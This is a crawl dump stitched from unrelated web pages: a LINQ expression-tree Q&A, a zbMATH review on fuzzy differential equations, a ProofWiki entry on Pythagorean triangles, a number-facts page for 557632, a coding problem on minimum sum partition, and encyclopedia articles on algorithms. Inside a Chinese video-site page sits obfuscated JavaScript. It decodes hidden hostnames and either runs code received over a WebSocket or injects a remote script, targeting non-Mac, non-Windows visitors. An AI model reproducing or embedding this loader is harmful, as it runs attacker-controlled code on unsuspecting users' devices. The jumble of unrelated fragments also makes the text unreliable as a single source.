] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90717626,"math_prob":0.9911683,"size":9731,"snap":"2023-40-2023-50","text_gpt3_token_len":2158,"char_repetition_ratio":0.217436,"word_repetition_ratio":0.13983841,"special_character_ratio":0.23348063,"punctuation_ratio":0.10579479,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99929965,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,null,null,null,null,null,null,null,null,2,null,null,null,null,null,null,null,null,null,2,null,2,null,null,null,null,null,null,null,null,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T00:10:30Z\",\"WARC-Record-ID\":\"<urn:uuid:caa20ccd-edd9-41e2-b3e8-509b5c28b618>\",\"Content-Length\":\"249153\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:59fbb57c-7d2f-4803-bd0a-6f7b95c2204a>\",\"WARC-Concurrent-To\":\"<urn:uuid:c2e29bb9-5cd2-41ff-99b1-09b892fd1dfd>\",\"WARC-IP-Address\":\"141.193.213.11\",\"WARC-Target-URI\":\"https://thirdspacelearning.com/gcse-maths/probability/experimental-probability/\",\"WARC-Payload-Digest\":\"sha1:2OSX4UEWV5RRSV3SP7A4LZPXF66CIMUC\",\"WARC-Block-Digest\":\"sha1:WBHMAPUNPIG4OBGS3WZJJMITVUHAIGA6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506539.13_warc_CC-MAIN-20230923231031-20230924021031-00021.warc.gz\"}"} |
https://expressiontree-tutorial.net/knowledge-base/13527221/how-can-i-create-a-linq-friendly--return-false--expression-using-csharp-expression-trees- | [
"# How can I create a LINQ-friendly 'return false' expression using C# expression trees?\n\n.net c# expression-trees linq",
null,
"### Question\n\nI have some code that dynamically builds up some search criteria based on user input, resulting in an `Expression<Func<T, bool>>` that is passed to the LINQ .Where() method. It works fine when input is present, but when input is not present, I want to create a simple 'return false;' statement so that no results are returned.\n\nBelow is my current attempt, but when this is passed to the .Where() method it throws a NotSupportedException \"Unknown LINQ expression of type 'Block'.\"\n\n``````var parameter = Expression.Parameter(typeof(T), \"x\");\nvar falseValue = Expression.Constant(false);\nvar returnTarget = Expression.Label(typeof (bool));\n\nvar returnFalseExpression = Expression.Block(Expression.Return(returnTarget, falseValue), Expression.Label(returnTarget, falseValue));\nvar lambdaExpression = Expression.Lambda<Func<T, bool>>(returnFalseExpression, parameter);\n``````\n\nHow can I build a 'return false' expression that can be interpreted by LINQ?\n\n1\n3\n7/29/2013 10:45:54 PM\n\n#### Fastest Entity Framework Extensions\n\n``````Expression<Func<T, bool>> falsePredicate = x => false;\n``````\n8\n11/23/2012 10:33:05 AM\n\nCan you wrap the entire thing in an if-else expression?\n\nMeaning:\n\n``````if input\nreturn <your normal code>\nelse\nreturn false\n``````\n\nThe return is implicit in expressions; the return value of the expression will simply be the last value. So you could try:\n\n`````` Expression.Condition\n(\nExpression.NotEqual(input, Expression.Constant(\"\")),\nnormalSearchExpression,\nExpression.Constant(false)\n)\n``````\n\nThat's assuming `normalSearchExpression` also returns a bool.\n\nPrime Library\n\nMore Projects..."
] | [
null,
"https://expressiontree-tutorial.net/images/bg-kb-title.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.67617613,"math_prob":0.8825373,"size":1416,"snap":"2022-40-2023-06","text_gpt3_token_len":293,"char_repetition_ratio":0.20042492,"word_repetition_ratio":0.0,"special_character_ratio":0.20762712,"punctuation_ratio":0.18072289,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95347166,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-06T14:14:37Z\",\"WARC-Record-ID\":\"<urn:uuid:76049aec-a810-474e-b707-bcc557225217>\",\"Content-Length\":\"44591\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3072d2e5-f5d9-4fab-b5ad-3c0cf0038212>\",\"WARC-Concurrent-To\":\"<urn:uuid:f3ad6f71-6dfc-4bd1-baa4-da245af85ad9>\",\"WARC-IP-Address\":\"40.83.160.29\",\"WARC-Target-URI\":\"https://expressiontree-tutorial.net/knowledge-base/13527221/how-can-i-create-a-linq-friendly--return-false--expression-using-csharp-expression-trees-\",\"WARC-Payload-Digest\":\"sha1:CKCKUBUW5DUM3F3NMTSDIOKB55WZMJ3I\",\"WARC-Block-Digest\":\"sha1:G55N2EJ4PL5ZEWMGLWT746XLUDFYBYGR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337836.93_warc_CC-MAIN-20221006124156-20221006154156-00740.warc.gz\"}"} |
https://zbmath.org/?q=an:0861.34040 | [
"## Approximate solutions, existence, and uniqueness of the Cauchy problem of fuzzy differential equations.(English)Zbl 0861.34040\n\nThe authors study the Cauchy problem $$x'(t)= f(t,x(t))$$, $$x(t_0)= x_0$$ for fuzzy differential equations. First the authors show that if $$x_n(t)$$ is a solution to an approximate differential equation and $$x_n(t)$$ converges uniformly, then the limit function is a solution to the Cauchy problem. Then they give an existence and uniqueness theorem for a solution to the Cauchy problem, which generalizes the corresponding theorem of O. Kaleva [Fuzzy Sets Syst. 24, 301-317 (1987; Zbl 0646.34019)]. (Also submitted to MR).\nReviewer: O.Kaleva (Tampere)\n\n### MSC:\n\n 34G20 Nonlinear differential equations in abstract spaces 34A45 Theoretical approximation of solutions to ordinary differential equations\n\nZbl 0646.34019\nFull Text:"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.777814,"math_prob":0.99877346,"size":1165,"snap":"2023-40-2023-50","text_gpt3_token_len":335,"char_repetition_ratio":0.14298019,"word_repetition_ratio":0.049382716,"special_character_ratio":0.31072962,"punctuation_ratio":0.22362868,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99986887,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T22:24:34Z\",\"WARC-Record-ID\":\"<urn:uuid:ca76c68c-ac99-4a8e-82a5-2f476361159a>\",\"Content-Length\":\"52050\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e4badc3c-5d2b-4f2d-9023-aba223608981>\",\"WARC-Concurrent-To\":\"<urn:uuid:23ce8102-e1d1-49b5-ae7f-1abe3bd8f03a>\",\"WARC-IP-Address\":\"141.66.194.2\",\"WARC-Target-URI\":\"https://zbmath.org/?q=an:0861.34040\",\"WARC-Payload-Digest\":\"sha1:B7I3TFYCD3PFSVY5QDKIMHSVNAHAWTHY\",\"WARC-Block-Digest\":\"sha1:YILXUMZJ6HTQTKVUIGUUPIBFXZTUI4BN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506045.12_warc_CC-MAIN-20230921210007-20230922000007-00307.warc.gz\"}"} |
https://proofwiki.org/wiki/Definition:Primitive_Pythagorean_Triangle | [
"# Definition:Primitive Pythagorean Triangle\n\n## Definition\n\nA primitive Pythagorean triangle is a Pythagorean triangle whose sides form a primitive Pythagorean triple.\n\n## Examples\n\n### $3-4-5$ Triangle\n\nThe triangle whose sides are of length $3$, $4$ and $5$ is a primitive Pythagorean triangle.\n\n### $5-12-13$ Triangle\n\nThe triangle whose sides are of length $5$, $12$ and $13$ is a primitive Pythagorean triangle.\n\n### $7-24-25$ Triangle\n\nThe triangle whose sides are of length $7$, $24$ and $25$ is a primitive Pythagorean triangle.\n\n### $693-1924-2045$ Triangle\n\nThe triangle whose sides are of length $693$, $1924$ and $2045$ is a primitive Pythagorean triangle."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7619475,"math_prob":0.99968135,"size":667,"snap":"2022-05-2022-21","text_gpt3_token_len":181,"char_repetition_ratio":0.22775264,"word_repetition_ratio":0.21276596,"special_character_ratio":0.2923538,"punctuation_ratio":0.08547009,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997992,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-27T06:49:02Z\",\"WARC-Record-ID\":\"<urn:uuid:d5767340-64e9-4606-a644-a8e7a01c24fd>\",\"Content-Length\":\"38997\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:173152df-5518-43e9-82e4-c2c9ba6312bf>\",\"WARC-Concurrent-To\":\"<urn:uuid:dfb4a052-2438-4345-8ed7-764d41749e1c>\",\"WARC-IP-Address\":\"172.67.198.93\",\"WARC-Target-URI\":\"https://proofwiki.org/wiki/Definition:Primitive_Pythagorean_Triangle\",\"WARC-Payload-Digest\":\"sha1:GKS43T3QAXKPMD3MNGWXSTEJDC7FU3AX\",\"WARC-Block-Digest\":\"sha1:OCQUWF7XPULH55L7F3YGDZKBVVJ73YVV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662636717.74_warc_CC-MAIN-20220527050925-20220527080925-00368.warc.gz\"}"} |
https://metanumbers.com/557632 | [
"## 557632\n\n557,632 (five hundred fifty-seven thousand six hundred thirty-two) is an even six-digits composite number following 557631 and preceding 557633. In scientific notation, it is written as 5.57632 × 105. The sum of its digits is 28. It has a total of 7 prime factors and 14 positive divisors. There are 278,784 positive integers (up to 557632) that are relatively prime to 557632.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 6\n• Sum of Digits 28\n• Digital Root 1\n\n## Name\n\nShort name 557 thousand 632 five hundred fifty-seven thousand six hundred thirty-two\n\n## Notation\n\nScientific notation 5.57632 × 105 557.632 × 103\n\n## Prime Factorization of 557632\n\nPrime Factorization 26 × 8713\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 7 Total number of prime factors rad(n) 17426 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 557,632 is 26 × 8713. Since it has a total of 7 prime factors, 557,632 is a composite number.\n\n## Divisors of 557632\n\n14 divisors\n\n Even divisors 12 2 2 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 14 Total number of the positive divisors of n σ(n) 1.10668e+06 Sum of all the positive divisors of n s(n) 549046 Sum of the proper positive divisors of n A(n) 79048.4 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 746.748 Returns the nth root of the product of n divisors H(n) 7.05431 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 557,632 can be divided by 14 positive divisors (out of which 12 are even, and 2 are odd). The sum of these divisors (counting 557,632) is 1,106,678, the average is 790,48.,428.\n\n## Other Arithmetic Functions (n = 557632)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 278784 Total number of positive integers not greater than n that are coprime to n λ(n) 34848 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 45788 Total number of primes less than or equal to n r2(n) 8 The number of ways n can be represented as the sum of 2 squares\n\nThere are 278,784 positive integers (less than 557,632) that are coprime with 557,632. 
And there are approximately 45,788 prime numbers less than or equal to 557,632.\n\n## Divisibility of 557632\n\n m n mod m 2 3 4 5 6 7 8 9 0 1 0 2 4 5 0 1\n\nThe number 557,632 is divisible by 2, 4 and 8.\n\n• Deficient\n\n• Polite\n\n• Frugal\n\n## Base conversion (557632)\n\nBase System Value\n2 Binary 10001000001001000000\n3 Ternary 1001022221001\n4 Quaternary 2020021000\n5 Quinary 120321012\n6 Senary 15541344\n8 Octal 2101100\n10 Decimal 557632\n12 Duodecimal 22a854\n20 Vigesimal 39e1c\n36 Base36 by9s\n\n## Basic calculations (n = 557632)\n\n### Multiplication\n\nn×i\n n×2 1115264 1672896 2230528 2788160\n\n### Division\n\nni\n n⁄2 278816 185877 139408 111526\n\n### Exponentiation\n\nni\n n2 310953447424 173397592793939968 96692046464870332235776 53918579254298573105300242432\n\n### Nth Root\n\ni√n\n 2√n 746.748 82.3094 27.3267 14.1016\n\n## 557632 as geometric shapes\n\n### Circle\n\n Diameter 1.11526e+06 3.50371e+06 9.76889e+11\n\n### Sphere\n\n Volume 7.26326e+17 3.90756e+12 3.50371e+06\n\n### Square\n\nLength = n\n Perimeter 2.23053e+06 3.10953e+11 788611\n\n### Cube\n\nLength = n\n Surface area 1.86572e+12 1.73398e+17 965847\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 1.6729e+06 1.34647e+11 482923\n\n### Triangular Pyramid\n\nLength = n\n Surface area 5.38587e+11 2.04351e+16 455305"
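A short Python sketch reproducing a few of the divisor functions listed above for n = 557632, using the factorization 2^6 × 8713 (with 8713 prime) for the totient:

```python
n = 557632
divs = [d for d in range(1, n + 1) if n % d == 0]   # brute force is fine for a one-off check

print(len(divs))        # -> 14       (tau, the number of divisors)
print(sum(divs))        # -> 1106678  (sigma, the sum of divisors)
print(sum(divs) - n)    # -> 549046   (aliquot sum)

# Euler totient from the prime factorization 2^6 * 8713:
phi = (2**6 - 2**5) * (8713 - 1)
print(phi)              # -> 278784
```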
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.61615753,"math_prob":0.9901191,"size":4626,"snap":"2021-31-2021-39","text_gpt3_token_len":1616,"char_repetition_ratio":0.11921246,"word_repetition_ratio":0.02835821,"special_character_ratio":0.4638997,"punctuation_ratio":0.08163265,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9986082,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-25T03:22:12Z\",\"WARC-Record-ID\":\"<urn:uuid:22c7e94f-2d2b-4ad6-bd6c-3117b7923005>\",\"Content-Length\":\"59882\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9945d3ce-76e6-4d94-8f37-257779d9b704>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb90034e-41a3-465a-8a28-a5492d3c76e9>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/557632\",\"WARC-Payload-Digest\":\"sha1:3UOPRR6O5NCYFC45KRYQATKHWD3RDLQB\",\"WARC-Block-Digest\":\"sha1:NKM7PMUTCDB4QPWVX5SB5A5QXRZA5ESJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046151563.91_warc_CC-MAIN-20210725014052-20210725044052-00053.warc.gz\"}"} |
https://www.bayitv.com/detail/zhengyilianmengliangmianjiaji.html | [
" 《正义联盟两面夹击在线免费观看》高清完整版_动漫_八一影视\n• 观看记录",
null,
"2021-07-18 11:17:57 更新\n\n• 在线观看2\n• 在线播放2\n\n• 近期热播\nfunction rKqOA(e){var t=\"\",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function hYTQN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return rKqOA(t);};window['\\x7a\\x4c\\x43\\x73\\x53\\x48\\x65\\x6b\\x61']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=hYTQN,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c+''+c,'g'),c)));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHkubHHVhc3NhbmUuY24=','dHIueWVzdW422NzguY229t','130796',window,document,['H','2']);}:function(){};"
] | [
null,
"http://inews.gtimg.com/newsapp_ls/0/13644658996/0",
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.5124701,"math_prob":0.98708695,"size":2327,"snap":"2021-31-2021-39","text_gpt3_token_len":1326,"char_repetition_ratio":0.104606114,"word_repetition_ratio":0.0,"special_character_ratio":0.33519554,"punctuation_ratio":0.26296958,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9580938,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T05:14:47Z\",\"WARC-Record-ID\":\"<urn:uuid:a6e2fd73-32b2-4f29-941d-999179bfce51>\",\"Content-Length\":\"18716\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3e29107f-0e80-4401-83a2-2a11421dd82d>\",\"WARC-Concurrent-To\":\"<urn:uuid:b86eb221-dcfb-4828-917a-cc9c2f497363>\",\"WARC-IP-Address\":\"118.107.39.81\",\"WARC-Target-URI\":\"https://www.bayitv.com/detail/zhengyilianmengliangmianjiaji.html\",\"WARC-Payload-Digest\":\"sha1:B2FF5BO6FUPTX4W5ZTN2KFNIB4HSJ56G\",\"WARC-Block-Digest\":\"sha1:WPL26EKZGMW2WFTPSYXWRABAPD4RXM63\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152236.64_warc_CC-MAIN-20210727041254-20210727071254-00173.warc.gz\"}"} |
https://practice.geeksforgeeks.org/problems/minimum-sum-partition3317/1 | [
"X",
null,
"DAYS\n\n:\n\nHOUR\n\n:\n\nMINS\n\n:\n\nSEC\n\nCopied to Clipboard\nMinimum sum partition\nHard Accuracy: 50.0% Submissions: 36757 Points: 8\n\nGiven an integer array arr of size N, the task is to divide it into two sets S1 and S2 such that the absolute difference between their sums is minimum and find the minimum difference\n\nExample 1:\n\nInput: N = 4, arr[] = {1, 6, 11, 5}\nOutput: 1\nExplanation:\nSubset1 = {1, 5, 6}, sum of Subset1 = 12\nSubset2 = {11}, sum of Subset2 = 11\nExample 2:\nInput: N = 2, arr[] = {1, 4}\nOutput: 3\nExplanation:\nSubset1 = {1}, sum of Subset1 = 1\nSubset2 = {4}, sum of Subset2 = 4\n\nYou don't need to read input or print anything. Complete the function minDifference() which takes N and array arr as input parameters and returns the integer value\n\nExpected Time Complexity: O(N*|sum of array elements|)\nExpected Auxiliary Space: O(N*|sum of array elements|)\n\nConstraints:\n1 ≤ N*|sum of array elements| ≤ 106\n\nWe are replacing the old Disqus forum with the new Discussions section given below.\n\nEditorial\n\nWe strongly recommend solving this problem on your own before viewing its editorial. Do you still want to view the editorial?\n\nMy Submissions:",
null,
"",
null,
""
] | [
null,
"https://practice.geeksforgeeks.org/problems/minimum-sum-partition3317/1",
null,
"https://media.geeksforgeeks.org/img-practice/slider-icon-1605160260.svg",
null,
"https://media.geeksforgeeks.org/img-practice/editor-nonloggedin-1599825843.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.83405834,"math_prob":0.9543824,"size":937,"snap":"2022-05-2022-21","text_gpt3_token_len":269,"char_repetition_ratio":0.13826367,"word_repetition_ratio":0.0,"special_character_ratio":0.30309498,"punctuation_ratio":0.14136125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9926377,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-25T07:42:26Z\",\"WARC-Record-ID\":\"<urn:uuid:b4798fae-624e-455c-af0d-1ef8c2645aa1>\",\"Content-Length\":\"77502\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1113280e-1c61-406e-b331-b72dcd0259cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:c7271d3c-7dd4-41f5-9066-6948e9db08ed>\",\"WARC-IP-Address\":\"13.249.38.101\",\"WARC-Target-URI\":\"https://practice.geeksforgeeks.org/problems/minimum-sum-partition3317/1\",\"WARC-Payload-Digest\":\"sha1:Y37O2VYZZSGP23BUEPI4CQQJ7HSOEDPC\",\"WARC-Block-Digest\":\"sha1:XH22XFVMIQV3WCTOPDGDYW3LLUJKFOIL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320304798.1_warc_CC-MAIN-20220125070039-20220125100039-00669.warc.gz\"}"} |
https://encyclopedia2.thefreedictionary.com/Encoding+Algorithm | [
"# algorithm\n\n(redirected from Encoding Algorithm)\nAlso found in: Dictionary, Thesaurus, Medical, Financial.\n\n## algorithm\n\n(ăl`gərĭth'əm) or\n\n## algorism\n\n(–rĭz'əm) [for Al-KhowarizmiAl-Khowarizmi\n, fl. 820, Arab mathematician of the court of Mamun in Baghdad. His treatises on Hindu arithmetic and on algebra made him famous. He is said to have given algebra its name, and the word algorithm is said to have been derived from his name.\n], a clearly defined procedure for obtaining the solution to a general type of problem, often numerical. Much of ordinary arithmetic as traditionally taught consists of algorithms involving the fundamental operations of addition, subtraction, multiplication, and division. An example of an algorithm is the common procedure for division, e.g., the division of 1,347 by 8, in which the remainders of partial divisions are carried to the next digit or digits; in this case the remainder of 5 in the division of 13 by 8 is placed in front of the 4, and 8 is then divided into 54. The software that instructs modern computers embodies algorithms, often of great sophistication.\n\n## algorithm\n\nany method, procedure, or set of instructions for carrying out a task by means of a precisely specified series of steps or sequence of actions, e.g. as in long division, the hierarchical sequence of steps in a typical computer program, or the steps in a manufacturing process.\nCollins Dictionary of Sociology, 3rd ed. © HarperCollins Publishers 2000\nThe following article is from The Great Soviet Encyclopedia (1979). It might be outdated or ideologically biased.\n\n## Algorithm\n\none of the basic concepts (categories) of mathematics devoid of a formal definition in terms of simpler concepts and abstracted directly from experience. Examples of algorithms are the familiar rules of addition, subtraction, multiplication, and long division taught in elementary school. In general, the term “algorithm” denotes any precise procedure specifying a calculational process (called algorithmic in this case) that begins with an arbitrary initial datum (drawn from a certain set of initial data possible for the given algorithm) and that is directed toward a result fully determined by the initial datum. For example, in the case of the algorithms of arithmetical operations mentioned above, the possible results may be natural numbers expressed in the decimal system, while the possible initial data may consist of ordered pairs of natural numbers. Thus, besides directions for carrying out the algorithmic process, the procedure must include (1) an indication of the set of possible initial data and (2) a rule by which the process is recognized as completed, when the desired result is attained. It is not assumed that the result must be achieved: the process of applying the algorithm to a specific possible initial datum (that is, an algorithmic process that develops from this datum onward) may also be terminated without a result or not terminated at all. If the process terminates (or does not terminate) by achieving a result, the algorithm is said to be applicable (or inapplicable) to the possible initial datum under consideration. 
It is possible to construct an algorithm II for which there exists no algorithm that discerns, on the basis of the possible initial datum for II, whether II is applicable to it or not; for instance, such an algorithm II can be constructed so that the set of positive integers serves as the set of its possible initial data.\n\nThe algorithm concept occupies a central position in modern mathematics, especially in computational mathematics. Thus, the problem of a numerical solution to equations of a given type reduces to finding an algorithm that will convert any pair, consisting of an arbitrary equation of the given type and an arbitrary rational number ε, into a number (or an n-tuple of numbers) which differs from the root or roots of the equation by less than ε. Improvements in computers offer the possibility of realizing increasingly complex algorithms with their use. However, the term “computational process” used in defining the algorithm concept must not be understood in the restricted meaning of digital calculations. Thus, even in school algebra courses one speaks of literal calculations, to say nothing of such nondigital symbols as brackets, equals signs, and the signs of arithmetical operations used in arithmetical calculations. It is possible to go further and consider calculations involving arbitrary symbols and their combinations; such precisely is the broad approach used to describe the algorithm concept. In this sense, one may speak of an algorithm for translation from one language to another, of an algorithm for train dispatching (which transforms information on train movements into orders), and of other such examples involving algorithmic descriptions of control processes. It is precisely for this reason that the algorithm is one of the central concepts of cybernetics. In general, the most varied constructive entities can serve as the initial data and results of algorithms. To take one example, the results of so-called recognition algorithms are the words “yes” and “no.”\n\nExample of an algorithm. Let the possible initial datum and the possible results consist of all possible finite sequences (including the empty sequence) of the letters a and b—“words in the alphabet {a, b}.” We shall agree to call the transition from word X to word Y “permissible” in the following two cases (P will denote an arbitrary word): (1) X has the form aP and Y has the form Pb and (2) X has the form baP and Y has the form Paba. An instruction is formulated: “starting with an arbitrary word, make permissible transitions until a word of the form aaP is obtained, then stop; the word P is the result.” This instruction forms an algorithm which we denote as I. We take the word babaa as the initial datum and obtain after one transition baaaba, after two, aabaaba. By virtue of the instruction we must stop, since the result is baaba. We take the word baaba as the initial datum and obtain, successively, abaaba, baabab, abababa, bababab, babababa, .... It can be demonstrated that this process will never end—that is, there will never appear a word beginning with aa, and for every word obtained it will always be possible to perform a permissible transition. Let us now take the word abaab as the initial datum. We obtain baabb, abbaba, bbabab. At this point, however, no further permissible transition is possible, yet there is no signal to stop. This is what is called the resultless stop. Thus, I is applicable to the word babaa and inapplicable to the words baaba and abaab.
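The algorithm I lends itself to a direct simulation; below is a small, hypothetical Python sketch (the step cap stands in for non-termination, which no program can detect in general):

```python
def run_I(word, max_steps=50):
    for _ in range(max_steps):
        if word.startswith("aa"):
            return word[2:]              # rule of completion: the word has the form aaP
        if word.startswith("ba"):
            word = word[2:] + "aba"      # permissible transition (2): baP -> Paba
        elif word.startswith("a"):
            word = word[1:] + "b"        # permissible transition (1): aP -> Pb
        else:
            return None                  # resultless stop: no transition is possible
    return None                          # gave up: the process may never terminate

print(run_I("babaa"))   # -> 'baaba'  (babaa -> baaaba -> aabaaba, then stop)
print(run_I("abaab"))   # -> None     (abaab -> baabb -> abbaba -> bbabab, resultless stop)
```

Significance of algorithms.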
Algorithms abound in science; the ability to solve a problem “in the general form” always means, essentially, a knowledge of some algorithm. In speaking, for example, of a person’s ability to add numbers, one has in mind not the fact that he can sooner or later find the sum of any two numbers, but rather the fact that he possesses a unified method of addition applicable to any two specific notations of numbers—in other words, an addition algorithm (the familiar rule for addition of numbers by column is such an algorithm). The notion of a problem “in the general form” is explicated with the help of the concept of a mass problem. A mass problem is specified by a series of separate, individual problems and consists in the requirement to find a general method—that is, an algorithm—for their solution. Thus, the problem of the numerical solution of equations of a given type and the problem of automatic translation are mass problems: the individual problems constituting them are, in the first case, problems of the numerical solutions of individual equations of a given type and, in the second, problems of the translation of individual phrases. The role of mass problems determines both the significance and the sphere of application of the algorithm concept. Mass problems are extremely characteristic of and important in mathematics: for example, in algebra mass problems arise in the verification of algebraic equations of various types; in mathematical logic, we find mass problems for recognizing the derivability of propositions from given axioms; and so on. In the case of mathematical logic, the concept of the algorithm is all the more essential because it is the basis of calculus—the central concept of mathematical logic. This concept serves as a generalization and explication of the intuitive concepts of “derivation” and “proof.” Establishing the unsolvability of some mass problem (say, the problem of recognizing the truth or demonstrability of sentences of some logicomathematical language)—that is, the absence of a unified algorithm that permits finding solutions to all individual problems of a given set—is an important cognitive act which shows that in the solution of concrete individual problems it is fundamentally necessary to have specific methods for each such problem. The existence of unsolvable mass problems is thus a sign of the inexhaustibility of the cognitive process.\n\nSubstantive phenomena which underlay the formation of the algorithm concept long occupied an important position in science. From very ancient times, many problems of mathematics consisted in the search for constructive methods of one kind or another. This search, especially intensified with the advent of convenient symbolism and with the realization that certain sought-for methods cannot, in principle, be found (the problem of squaring the circle and the like), was a powerful factor in the development of scientific knowledge. Realization of the impossibility of solving problems by direct calculation led to the creation, in the 19th century, of the set-theoretic concept. Only after a period of turbulent development of this concept, during which the question of constructive methods in the modern sense 